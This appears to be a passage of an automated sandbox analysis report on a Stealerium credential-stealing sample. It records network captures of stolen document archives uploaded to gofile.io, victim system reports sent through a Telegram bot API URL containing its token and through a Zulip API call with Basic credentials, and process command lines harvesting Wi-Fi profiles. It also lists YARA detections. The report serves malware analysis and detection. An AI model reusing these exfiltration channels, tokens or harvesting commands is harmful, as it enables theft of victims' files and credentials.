2024-11-29 09:57:24 UTC | 4096 | OUT | Data Raw: ed 69 1f 8f 6e 0b 63 24 86 0f 34 0c 80 3a b1 ba 97 fb e3 54 d1 0b 6c c9 98 0b 9c 7a ee e7 ae d7 91 f4 80 04 8d 4f 2d b7 f8 59 9b f0 ed 2b f1 a7 2b 6e 0c ac 92 6a 47 b5 f7 6b b2 70 45 96 f9 61 35 66 b5 55 9f 5e ac 77 bb 64 53 31 58 1f b6 41 f8 99 50 7b ed 15 b7 95 ba 5f 4a a4 33 ec b2 bd 13 ba dd d5 56 e4 07 24 2c c5 f1 6a 70 bc e3 31 88 22 67 16 35 9d 71 92 1b c6 98 fc 2a c0 ce b1 65 41 05 42 bf f3 e0 fc b6 3e 45 99 65 41 9e cd f9 f4 8b b7 1a 57 f9 00 59 aa a1 61 ed 7c 57 19 d0 bf a6 ae a4 de 2a 12 e7 a3 da 00 37 04 0d 2e 6d 81 dd 75 fc 33 d0 95 9d 82 58 ca 3d 3e 4c 98 d7 88 d2 7f c9 6b 64 ca f7 98 b9 05 2d cf 94 88 23 f7 de 88 48 ee 71 15 5c 8e 06 1f 29 6c 15 b2 c8 b2 2c e7 52 0b 5a 65 e3 27 0a 3e b4 50 4b 07 08 2a 68 af 6f 92 02 00 00 02 04 00 00 50 4b
  Data Ascii: inc$4:TlzO-Y++njGkpEa5fU^wdS1XAP{_J3V$,jp1"g5q*eAB>EeAWYa|W*7.mu3X=>Lkd-#Hq\)l,RZe'>PK*hoPK
2024-11-29 09:57:24 UTC | 4096 | OUT | Data Raw: 44 52 49 56 45 2d 43 2f 55 73 65 72 73 2f 6a 6f 6e 65 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 4a 53 44 4e 47 59 43 4f 57 59 2e 78 6c 73 78 ad 71 a7 55 64 30 bb 31 5c 48 92 fa 42 86 c8 04 f7 ee ce 1d 95 e5 0b 7a 3d bb 3a 56 a7 57 26 ae 1e 98 1f 9f ec e1 86 5f 90 5a b5 d3 69 0e 5f be 93 51 10 53 30 a9 66 a7 d3 20 e3 fb 2c 8e 90 a9 4e c4 2c 2d 68 f0 52 59 ec 2b f2 26 36 f7 47 51 4f fe a8 43 6d c5 1e 04 89 03 bf bd 75 6d 98 e6 c8 47 ff c1 d4 4e 4f 7a b2 88 4c a1 17 b9 5c 1f ca 1f db 89 2c 20 45 96 75 49 a0 ab 4d 71 4e 17 d4 aa 9e 28 6d 5d d4 e0 cd 6f 24 1f dc ba b0 73 f5 58 51 f3 22 1c ac 63 3e bd 78 87 29 e6 0d 28 48 25 db f5 12 4c 63 d7 8a f0 5e 1d 2c 84 0c 28 8e b5 5a 00 7d 03 7c b7 61 c6 49 fa a2 92 94 36 f9 5a 6d 03 f4 df ca 34 c6 35 c5 64 1d 5d 60 5f fa d0
  Data Ascii: DRIVE-C/Users/user/Documents/JSDNGYCOWY.xlsxqUd01\HBz=:VW&_Zi_QS0f ,N,-hRY+&6GQOCmumGNOzL\, EuIMqN(m]o$sXQ"c>x)(H%Lc^,(Z}|aI6Zm45d]`_
2024-11-29 09:57:24 UTC | 4096 | OUT | Data Raw: 92 3e ec bd 5c c5 e2 b7 29 ee 47 d8 35 99 20 99 a4 aa 41 ae 5b af b0 4a b4 53 04 e8 8b 42 4c 59 ad 34 d1 47 71 17 22 d6 86 90 64 05 51 79 c9 71 fa 90 d5 c1 62 0c b1 63 cd 27 02 7e 67 b7 86 6a 13 73 9a ad a9 43 0e 0e 7e fd 24 9d 3d a4 79 83 ef b7 a6 e8 37 04 63 e7 09 ba 60 94 5a 2d 8d b1 e5 47 47 83 ce b2 68 32 8b f4 ef 31 b1 77 07 5d 86 b3 13 d7 2e 8e 66 4b 34 07 ea cf e4 5b 39 57 c9 5e fd e1 83 42 7d 66 7c 46 45 4c 14 e6 e6 77 6c 77 f4 45 99 d5 73 7a b8 51 8c e9 1c df 10 f4 be 7f f1 2f 1d 33 6f a4 f5 79 3b 07 8b 3f 47 a1 a8 28 4f 0b d1 6c 4c 92 81 85 c7 da bb 4a cc bd 8a 56 b2 04 e8 0c 2b 6a 1f e2 5f ec 17 82 e6 f9 41 a0 25 8d f1 b4 88 c3 f8 89 57 73 60 f5 18 bb 39 f5 6e ed d3 16 db 72 be 2f 5b 99 3c 1d 3b 9e bb c9 31 33 49 f3 c4 a6 e4 b3 32 29 81 5f be
  Data Ascii: >\)G5 A[JSBLY4Gq"dQyqbc'~gjsC~$=y7c`Z-GGh21w].fK4[9W^B}f|FELwlwEszQ/3oy;?G(OlLJV+j_A%Ws`9nr/[<;13I2)_
2024-11-29 09:57:24 UTC | 4096 | OUT | Data Raw: 9e 85 a7 ae 0b 91 2b 1e e4 cf a0 a7 2e 7e d4 48 87 5f dc f3 f5 f6 bb 2a 68 a1 0b 51 b4 55 6c 49 a9 be 66 0a 3a 30 38 91 2b 7d 79 1c 34 ad ca d6 87 4d 45 af 31 fa e5 5f 8a 97 0d 37 c6 21 75 39 00 11 b6 5e e7 16 2c 34 84 86 37 2a 58 ef 91 a9 ba 9f a4 ba 63 52 c9 b0 7c 63 b5 be 07 27 ae 67 f2 4a b8 4c 3b 54 f4 52 4d 2a f2 c9 10 31 c0 6e aa 32 41 02 1d df 50 4b 07 08 c8 29 ec a0 95 02 00 00 02 04 00 00 50 4b 03 04 14 00 09 08 08 00 55 40 44 57 54 2f ec ed 92 02 00 00 02 04 00 00 40 00 00 00 47 72 61 62 62 65 72 2f 44 52 49 56 45 2d 43 2f 55 73 65 72 73 2f 6a 6f 6e 65 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 57 55 54 4a 53 43 42 43 46 58 2f 59 50 53 49 41 43 48 59 58 57 2e 78 6c 73 78 71 7e 17 26 32 53 fa 91 68 b5 92 c4 73 c8 0b b2 c1 86 b6 f1 fb fc 90 cf 66 a6 60
  Data Ascii: +.~H_*hQUlIf:08+}y4ME1_7!u9^,47*XcR|c'gJL;TRM*1n2APK)PKU@DWT/@Grabber/DRIVE-C/Users/user/Documents/WUTJSCBCFX/YPSIACHYXW.xlsxq~&2Shsf`
2024-11-29 09:57:24 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-11-29 09:57:25 UTC | 888 | IN | HTTP/1.1 200 OK
  Server: nginx/1.27.1
  Date: Fri, 29 Nov 2024 09:57:25 GMT
  Content-Type: application/json
  Content-Length: 439
  Connection: close
  Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
  Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
  {"data":{"createTime":1732874245,"downloadPage":"https://gofile.io/d/liMaKC","guestToken":"IfFiIhbRmeAO6lmgxxDEq63xzBhnkCqa","id":"8ec4b468-6234-4583-899e-187582c93c4e","md5":"32a27034121055815bac17aef7ffe522","mimetype":"application/zip","modTime":1732874245,"name":"user@724536_en-CH.zip","parentFolder":"c420f31b-7cd7-4547-b94f-38d93a580f30","parentFolderCode":"liMaKC","servers":["store6"],"size":121765,"type":"file"},"status":"ok"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49748 | 149.154.167.220 | 443 | 4828 | C:\Users\user\AppData\Local\Temp\JOUNLV.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 09:57:29 UTC | 2142 | OUT | GET /bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage?chat_id=-4556397073&text=%60%60%60%0A%F0%9F%98%B9%20%2AStealerium%20v3.5.2%20-%20Report%3A%2A%0ADate%3A%202024-11-29%204%3A57%3A07%20am%0ASystem%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0AUsername%3A%20user%0ACompName%3A%20724536%0ALanguage%3A%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus%3A%20Windows%20Defender%0A%0A%F0%9F%92%BB%20%2AHardware%3A%2A%0ACPU%3A%20Intel%28R%29%20Core%28TM%292%20CPU%206600%20%40%202.40%20GHz%0AGPU%3A%20PA_NMRCU%0ARAM%3A%204095MB%0APower%3A%20NoSystemBattery%20%28100%25%29%0AScreen%3A%201280x1024%0AWebcams%20count%3A%200%0A%0A%F0%9F%93%A1%20%2ANetwork%3A%2A%20%0AGateway%20IP%3A%20192.168.2.1%0AInternal%20IP%3A%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system%21%0AExternal%20IP%3A%208.46.123.228%0A%0A%F0%9F%92%B8%20%2ADomains%20info%3A%2A%0A%20%20%20-%20%F0%9F%8F%A6%20%2ABanking%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20%2ACryptocurrency%20services%2A%20%28N [TRUNCATED]
  Host: api.telegram.org
  Connection: Keep-Alive
2024-11-29 09:57:29 UTC | 389 | IN | HTTP/1.1 200 OK
  Server: nginx/1.18.0
  Date: Fri, 29 Nov 2024 09:57:29 GMT
  Content-Type: application/json
  Content-Length: 1680
  Connection: close
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Access-Control-Allow-Origin: *
  Access-Control-Allow-Methods: GET, POST, OPTIONS
  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-29 09:57:29 UTC | 1680 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 34 34 34 39 38 34 37 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 61 74 72 69 6f 74 72 6f 73 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 61 74 72 69 6f 74 70 32 31 30 52 6f 68 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 35 36 33 39 37 30 37 33 2c 22 74 69 74 6c 65 22 3a 22 52 6f 68 73 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 38 37 34 32 34 39 2c 22 74 65 78 74
  Data Ascii: {"ok":true,"result":{"message_id":1392,"from":{"id":7944498476,"is_bot":true,"first_name":"Patriotrosh","username":"Patriotp210Rohs_bot"},"chat":{"id":-4556397073,"title":"Rohs","type":"group","all_members_are_administrators":true},"date":1732874249,"text


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49751 | 50.17.0.11 | 443 | 4828 | C:\Users\user\AppData\Local\Temp\JOUNLV.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 09:57:31 UTC | 278 | OUT | POST /api/v1/messages HTTP/1.1
  Authorization: Basic c3p1cnVib29ydUBnbWFpbC5jb206Zmd3VDV1bWJyUWRXNlkxYnVJV1pKSzZTMkZWUVpBZVM=
  Content-Type: application/x-www-form-urlencoded
  Host: szurubooru.zulipchat.com
  Content-Length: 1691
  Expect: 100-continue
  Connection: Keep-Alive
2024-11-29 09:57:32 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-11-29 09:57:32 UTC | 1691 | OUT | Data Raw: 74 79 70 65 3d 73 74 72 65 61 6d 26 74 6f 3d 53 7a 75 72 75 62 6f 6f 72 75 26 74 6f 70 69 63 3d 6a 6f 6e 65 73 26 63 6f 6e 74 65 6e 74 3d 25 36 30 25 36 30 25 36 30 25 30 41 25 46 30 25 39 46 25 39 38 25 42 39 2b 25 32 41 53 74 65 61 6c 65 72 69 75 6d 2b 76 33 2e 35 2e 32 2b 2d 2b 52 65 70 6f 72 74 25 33 41 25 32 41 25 30 41 44 61 74 65 25 33 41 2b 32 30 32 34 2d 31 31 2d 32 39 2b 34 25 33 41 35 37 25 33 41 30 37 2b 61 6d 25 30 41 53 79 73 74 65 6d 25 33 41 2b 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 2b 25 32 38 36 34 2b 42 69 74 25 32 39 25 30 41 55 73 65 72 6e 61 6d 65 25 33 41 2b 6a 6f 6e 65 73 25 30 41 43 6f 6d 70 4e 61 6d 65 25 33 41 2b 37 32 34 35 33 36 25 30 41 4c 61 6e 67 75 61 67 65 25 33 41 2b 25 46 30 25 39 46 25
  Data Ascii: type=stream&to=Szurubooru&topic=user&content=%60%60%60%0A%F0%9F%98%B9+%2AStealerium+v3.5.2+-+Report%3A%2A%0ADate%3A+2024-11-29+4%3A57%3A07+am%0ASystem%3A+Microsoft+Windows+10+Pro+%2864+Bit%29%0AUsername%3A+user%0ACompName%3A+724536%0ALanguage%3A+%F0%9F%
2024-11-29 09:57:32 UTC | 747 | IN | HTTP/1.1 200 OK
  Date: Fri, 29 Nov 2024 09:57:32 GMT
  Content-Type: application/json
  Content-Length: 81
  Connection: close
  Server: nginx/1.18.0 (Ubuntu)
  Vary: Accept-Encoding
  Expires: Fri, 29 Nov 2024 09:57:32 GMT
  Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
  Vary: Accept-Language
  Content-Language: en
  X-RateLimit-Limit: 200
  X-RateLimit-Remaining: 197
  X-RateLimit-Reset: 1732874312
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: Authorization
                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, DELETE, PUT, PATCH, HEAD
                                                                                                                                                                                                                                                          {"result":"success","msg":"","id":485061621,"automatic_new_visibility_policy":3}

Target ID: 0
Start time: 04:57:05
Start date: 29/11/2024
Path: C:\Users\user\Desktop\LKxcbzlwkz.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\LKxcbzlwkz.exe"
Imagebase: 0x400000
File size: 5'015'009 bytes
MD5 hash: 8959A4884F81AC4DB0967B534DAE9617
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: false

Target ID: 1
Start time: 04:57:06
Start date: 29/11/2024
Path: C:\Users\user\AppData\Local\Temp\JOUNLV.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\JOUNLV.exe"
Imagebase: 0x1bb35cc0000
File size: 3'747'840 bytes
MD5 hash: 8F39B25AF1B9048E0C7B06256C602B4F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000001.00000002.2015535093.000001BB384E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
• Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
• Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 66%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 2
Start time: 04:57:06
Start date: 29/11/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AEAWHK.bat" "
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 04:57:06
Start date: 29/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                          Start time:04:57:06
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\openfiles.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:OPENFILES
                                                                                                                                                                                                                                                          Imagebase:0x7f0000
                                                                                                                                                                                                                                                          File size:60'416 bytes
                                                                                                                                                                                                                                                          MD5 hash:50BD10A4C573E609A401114488299D3D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                          Start time:04:57:14
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                                                                                                                                                                                                          Imagebase:0x7ff7de3a0000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                          Start time:04:57:14
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                          Start time:04:57:14
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:chcp 65001
                                                                                                                                                                                                                                                          Imagebase:0x7ff617a80000
                                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                          Start time:04:57:14
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                          Imagebase:0x7ff7b3ed0000
                                                                                                                                                                                                                                                          File size:69'632 bytes
                                                                                                                                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                          Start time:04:57:14
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:netsh wlan show profile
                                                                                                                                                                                                                                                          Imagebase:0x7ff783dc0000
                                                                                                                                                                                                                                                          File size:96'768 bytes
                                                                                                                                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                          Start time:04:57:14
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:findstr All
                                                                                                                                                                                                                                                          Imagebase:0x7ff645d30000
                                                                                                                                                                                                                                                          File size:36'352 bytes
                                                                                                                                                                                                                                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                          Start time:04:57:15
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                                                                                                                                                                                                          Imagebase:0x7ff7de3a0000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:04:57:15
Start date:29/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:04:57:15
Start date:29/11/2024
Path:C:\Windows\System32\chcp.com
Wow64 process (32bit):false
Commandline:chcp 65001
Imagebase:0x7ff617a80000
File size:14'848 bytes
MD5 hash:33395C4732A49065EA72590B14B64F32
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:04:57:15
Start date:29/11/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh wlan show networks mode=bssid
Imagebase:0x7ff783dc0000
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:04:57:31
Start date:29/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat"
Imagebase:0x7ff7de3a0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:04:57:31
Start date:29/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:04:57:31
Start date:29/11/2024
Path:C:\Windows\System32\chcp.com
Wow64 process (32bit):false
Commandline:chcp 65001
Imagebase:0x7ff617a80000
File size:14'848 bytes
MD5 hash:33395C4732A49065EA72590B14B64F32
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:04:57:31
Start date:29/11/2024
Path:C:\Windows\System32\taskkill.exe
Wow64 process (32bit):false
Commandline:taskkill /F /PID 4828
Imagebase:0x7ff6084c0000
File size:101'376 bytes
MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:04:57:31
Start date:29/11/2024
Path:C:\Windows\System32\timeout.exe
Wow64 process (32bit):false
Commandline:timeout /T 2 /NOBREAK
Imagebase:0x7ff79b1c0000
File size:32'768 bytes
MD5 hash:100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Execution Graph

Execution Coverage:4.2%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:13.1%
Total number of Nodes:2000
Total number of Limit Nodes:131
